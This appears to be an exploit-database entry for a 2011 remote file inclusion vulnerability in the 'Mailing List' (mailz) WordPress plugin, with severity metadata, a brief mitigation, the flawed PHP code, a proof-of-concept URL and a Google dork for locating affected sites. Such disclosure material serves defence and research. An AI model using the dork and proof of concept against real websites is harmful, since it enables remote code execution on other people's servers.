header-logo
Suggest Exploit
vendor:
Mailing List
by:
Ben Schmidt
8.8
CVSS
HIGH
Remote File Inclusion (RFI)
98
CWE
Product Name: Mailing List
Affected Version From: 1.3.2002
Affected Version To: 1.3.2002
Patch Exists: YES
Related CWE: N/A
CPE: o:wordpress:mailz:1.3.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2011

Mailing List WordPress plugin RFI

The Mailing List Wordpress plugin is vulnerable to a Remote File Inclusion (RFI) attack. By sending a specially crafted HTTP request, an attacker can include a remote file, such as a malicious PHP script, on the vulnerable server. This can allow the attacker to execute arbitrary code on the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file inclusion context.
Source

Exploit-DB raw data:

# Exploit Title: Mailing List Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/mailz
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/mailz/download/
# Version: 1.3.2 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/mailz/lists/config/config.php?wpabspath=RFI

---
Vulnerable Code
---
if ( isset($_GET['wpabspath']) ) {
	//zingiri
	//error_reporting(E_ALL & ~E_NOTICE);
	//ini_set('display_errors', '1');
	define('ABSPATH', dirname(__FILE__) . '/');
	require($_GET['wpabspath'].'wp-config.php');